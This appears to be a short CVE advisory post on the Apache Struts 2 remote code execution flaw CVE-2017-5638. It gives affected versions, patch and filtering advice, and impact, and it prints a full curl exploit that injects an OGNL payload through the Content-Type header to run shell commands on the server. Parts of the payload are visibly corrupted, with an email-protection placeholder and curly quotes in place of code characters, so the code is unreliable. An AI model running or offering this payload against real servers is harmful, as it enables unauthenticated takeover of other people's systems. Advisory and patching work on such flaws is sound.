Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent in an HTTP request, the parser incorrectly processes it while attempting to generate an error message. This flawed process uses the OGNL (Object-Graph Navigation Language) expression interpreter. An attacker can craft a request where the Content-Type header itself contains an OGNL expression. Because the parser evaluates this expression during the error-handling routine, it allows for the execution of arbitrary system commands with the privileges of the Struts application server. This provides a direct vector for complete server compromise without requiring authentication.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patch available.

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’whoami’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-showcase/fileupload/doUpload.action`

How Exploit:

Craft malicious HTTP request with OGNL payload in Content-Type header. The server evaluates the expression during file upload error, leading to command execution.

Protection from this CVE

Upgrade to Struts 2.3.32 or 2.5.10.1. If upgrade is impossible, implement a filter to block requests containing “Content-Type” headers with OGNL expressions.

Impact:

Full system compromise. Unauthenticated attackers can execute arbitrary commands on the server, leading to data theft, defacement, or a foothold for lateral movement.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top